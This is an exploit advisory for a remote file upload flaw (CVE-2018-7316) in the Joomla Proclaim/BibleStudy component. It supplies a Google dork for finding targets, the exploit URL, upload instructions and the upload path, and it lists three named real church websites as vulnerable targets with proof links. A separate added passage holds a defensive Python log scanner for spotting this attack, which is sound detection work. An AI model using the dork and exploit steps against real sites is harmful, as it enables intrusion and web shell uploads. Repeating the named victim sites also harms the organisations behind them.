Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability

Author: KingSkrupellos, Published: 11-10-2018
# Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CVE: CVE-2018-7316
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090270
# Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html

#################################################################################################

# Google Dork :

inurl:"/index.php?option=com_biblestudy"

# Exploit :

TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

# Note : Go to the "Media Files" category. Choose your file and upload it.

# Directory File Path :

TARGET/images/biblestudy/media/....
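
For site owners reviewing their own logs: the sketch below is an added example, not part of the original advisory or of the Proclaim code base. It flags requests to the mediafileform edit view and requests for script-type files under the upload directory named above. It assumes Combined Log Format access logs; the function names and the list of script extensions are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format prefix: ip ident user [time] "METHOD uri PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
MEDIA_DIR = "/images/biblestudy/media/"  # upload directory named in the advisory
# Assumption: extensions your server may hand to PHP; ".php.jpg" is caught too.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)

def classify(line):
    """Return (client_ip, reason) for a request worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, uri, _status = m.groups()
    parts = urlsplit(uri)
    query = {k.lower(): v[0].lower() for k, v in parse_qs(parts.query).items()}
    if query.get("option") == "com_biblestudy" and query.get("view") == "mediafileform":
        return ip, "form-submit" if method == "POST" else "form-view"
    path = unquote(parts.path).lower()
    if MEDIA_DIR in path and SCRIPT_EXT.search(path.rsplit("/", 1)[-1]):
        return ip, "script-in-media-dir"
    return None

def scan(lines):
    """Group findings per client so form access followed by a script fetch stands out."""
    hits = defaultdict(set)
    for line in lines:
        found = classify(line)
        if found:
            hits[found[0]].add(found[1])
    return dict(hits)

def correlated(hits):
    """Clients that touched the edit form and also requested a script file."""
    return sorted(ip for ip, r in hits.items()
                  if "script-in-media-dir" in r and r & {"form-view", "form-submit"})

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [11/Oct/2018:10:00:01 +0000] "GET /index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Oct/2018:10:00:09 +0000] "POST /index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 HTTP/1.1" 303 0',
    '192.0.2.10 - - [11/Oct/2018:10:00:15 +0000] "GET /images/biblestudy/media/notes.PhP HTTP/1.1" 200 12',
    '198.51.100.7 - - [11/Oct/2018:10:02:00 +0000] "GET /images/biblestudy/media/sermon.mp3 HTTP/1.1" 200 904113',
    '198.51.100.7 - - [11/Oct/2018:10:03:00 +0000] "GET /index.php?option=com_biblestudy&view=sermons HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    findings = scan(SAMPLE)
    for ip in correlated(findings):
        print(ip, sorted(findings[ip]))
```

A hit from `correlated` is a lead for review rather than proof of compromise; check the flagged files on disk and whether the media directory is configured to execute scripts.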

#################################################################################################

# Example Vulnerable Sites =>

kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

=> [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe

hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3

cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
